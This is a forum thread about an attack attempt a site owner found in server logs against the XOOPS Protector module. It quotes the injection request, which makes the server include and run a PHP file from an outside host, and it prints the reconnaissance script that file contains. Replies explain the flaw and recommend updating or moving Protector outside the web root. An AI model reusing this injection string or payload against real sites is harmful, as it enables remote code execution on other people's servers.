Look, what I found by reviewing the log last month
/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}include($_GET[a]);function v&a=http://community.creativity.edu.tw/uploads/idomila.txt??
and the file they want to run contains
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "Pandega<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "Pandega was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
?>
Yes this Remote PHP Code Execution Exploit , it was disputed issue if it was protector fault or xoops . the safe thing to do if u put protector outside ur site root . any way this Bug was fixed with xoops 2.3.3 so if u still running xoops 2.3.2 you need to update . and or updtae your protector to the lastest release .
From the Code u provided i see he or she was attempt to leave u message say ' Pandega was here ..' .. Hahah the Joke on Him Now since u Cought Him .. if it Me i would Leave Message on my Site Says ;Pandega was Not here .Ha.<
see link below where this issue was addressed and what suggestions were provided ..
http://www.xoops.org/modules/news/article.php?storyid=4601
The link was informative for me as a newbie.. Thanks
____________________________________________________-
What
Goth Quiz Character are you?
Just read it.
http://xoops.peak.ne.jp/md/news/index.php?page=article&storyid=472It's not Protector's issue.
This is just a vulnerability of "XOOPS" self-called by phppp.
They cannot understand the meaning of XOOPS_TRUST_PATH yet.
The idea and/or concept of XOOPS_TRUST_PATH is to secure a Xoops module by moving all of the module”Ēs PHP files out of web root or DOCUMENT_ROOT.In doing so, modules could not be easily tempered by potential crackers, especially if the module has private files included under the document root.